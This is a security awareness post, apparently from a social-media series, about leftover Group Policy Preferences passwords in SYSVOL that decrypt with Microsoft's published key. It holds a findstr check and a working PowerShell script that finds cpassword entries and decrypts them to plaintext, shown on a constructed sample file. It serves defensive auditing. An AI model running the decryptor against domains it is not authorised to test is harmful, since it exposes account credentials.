Passwords in Group Policy

🔒 Secure Bits 💡
Are passwords hiding in your Group Policies?

๐—›๐—ผ๐˜„ ๐—ผ๐—น๐—ฑ is your Active Directory? Are you sure there’s no history of stored credentials?

🚨 Before 2014, many admins used Group Policy Preferences (GPP) to set passwords for local accounts, scheduled tasks, services, mapped drives and data sources. It was convenient, but dangerously insecure. Microsoft removed the feature with MS14-025 in May 2014, yet that patch only stops new passwords from being written: any XML files that already held one stay in SYSVOL until someone deletes them.

๐—ง๐—ต๐—ฒ ๐—ฝ๐—ฟ๐—ผ๐—ฏ๐—น๐—ฒ๐—บ?
โ–ช๏ธThese passwords were stored in SYSVOL, accessible to any authenticated user.
โ–ช๏ธBut they were encrypted, right?
โ–ช๏ธYes… but….the ๐—”๐—˜๐—ฆ ๐—ฒ๐—ป๐—ฐ๐—ฟ๐˜†๐—ฝ๐˜๐—ถ๐—ผ๐—ป ๐—ธ๐—ฒ๐˜† ๐˜„๐—ฎ๐˜€ ๐—ฝ๐˜‚๐—ฏ๐—น๐—ถ๐—ฐ๐—น๐˜† ๐—ธ๐—ป๐—ผ๐˜„๐—ปโ€”making decryption trivial.

๐Ÿ’ก ๐—›๐—ผ๐˜„ ๐˜๐—ผ ๐—ฐ๐—ต๐—ฒ๐—ฐ๐—ธ if your environment is still exposed:
Run this simple PowerShell command:

$domain = Get-ADDomain | select -ExpandProperty Forest
findstr /S /I cpassword \$domainSYSVOL$domainPolicies*.xml
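The following PowerShell is an added example, not code from the original post. It goes one step beyond the findstr check: because the key is public, any domain user can not only find these entries but read them, and the script does exactly that so you can see what an attacker would see. The 32-byte AES-256 key is the one Microsoft published for GPP; the function names (Find-GppPassword, ConvertFrom-Cpassword, ConvertTo-Cpassword, New-GppAes), the temp folder and the sample Groups.xml are constructed for this demo. PowerSploit's Get-GPPPassword does the same job against a live domain.

```powershell
# Added example, not code from the original post. Finds GPP XML files that carry a
# cpassword attribute and decrypts them. The AES-256 key below is the one Microsoft
# published for GPP; function names, the temp folder and the sample Groups.xml are
# constructed for this demo.

[byte[]] $script:GppAesKey = @(
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
)

function New-GppAes {
    # AES-256 in CBC mode with PKCS7 padding and an all-zero IV, as GPP used it.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $script:GppAesKey
    $aes.IV      = New-Object byte[] 16
    return $aes
}

function ConvertFrom-Cpassword {
    param([Parameter(Mandatory)][string] $Cpassword)
    # GPP strips the trailing '=' padding from the Base64 text; restore it before decoding.
    $padded = $Cpassword + ('=' * ((4 - ($Cpassword.Length % 4)) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $aes = New-GppAes
    try {
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        return [System.Text.Encoding]::Unicode.GetString($plain)   # plaintext is UTF-16LE
    } finally { $aes.Dispose() }
}

function ConvertTo-Cpassword {
    # Demo-only helper (not a GPP API) so the example can build its own test data offline.
    param([Parameter(Mandatory)][string] $Plaintext)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Plaintext)
    $aes = New-GppAes
    try {
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
        return [Convert]::ToBase64String($cipher).TrimEnd('=')
    } finally { $aes.Dispose() }
}

function Find-GppPassword {
    # Walk a policy tree (a local folder or \\domain\SYSVOL\domain\Policies) and report
    # every element that carries a non-empty cpassword attribute, with the decrypted value.
    param([Parameter(Mandatory)][string] $Path)
    $files = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml'
    Get-ChildItem -Path $Path -Recurse -Include $files -ErrorAction SilentlyContinue | ForEach-Object {
        [xml] $doc = Get-Content -LiteralPath $_.FullName -Raw
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            if (-not $node.GetAttribute('cpassword')) { continue }   # empty attribute, nothing stored
            [pscustomobject]@{
                File     = $_.FullName
                # the account attribute differs per preference type; take the first one present
                Account  = ('userName','accountName','runAs' |
                            ForEach-Object { $node.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1)
                NewName  = $node.GetAttribute('newName')
                Changed  = $node.ParentNode.GetAttribute('changed')
                Password = ConvertFrom-Cpassword $node.GetAttribute('cpassword')
            }
        }
    }
}

# Offline demo with a constructed Groups.xml in a temp folder (no domain needed).
$demo = Join-Path ([IO.Path]::GetTempPath()) ('gpp-demo-' + [guid]::NewGuid())
$dir  = Join-Path $demo 'Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$cp = ConvertTo-Cpassword 'S3cretLocalAdmin!'
@"
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" changed="2013-11-04 09:12:01">
    <Properties action="U" newName="locadm" userName="Administrator (built-in)" cpassword="$cp"/>
  </User>
</Groups>
"@ | Set-Content -LiteralPath (Join-Path $dir 'Groups.xml') -Encoding UTF8
Find-GppPassword -Path $demo | Format-List
Remove-Item -LiteralPath $demo -Recurse -Force

# Live check (domain-joined host with the ActiveDirectory module):
# Find-GppPassword -Path ("\\{0}\SYSVOL\{0}\Policies" -f (Get-ADDomain).DNSRoot)
```

Run the live check with a plain domain user account on purpose: if it returns anything, that is exactly what an attacker with nothing more than a foothold gets, and every account listed needs its password rotated after the XML is cleaned out of SYSVOL.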

โœ… ๐—ข๐—ฟ ๐˜‚๐˜€๐—ฒ ๐—บ๐˜† ๐—ณ๐—ฟ๐—ฒ๐—ฒ ๐˜๐—ผ๐—ผ๐—น, ADProbe, to scan your Active Directory:
https://academy.horizon-secured.com/p/adprobe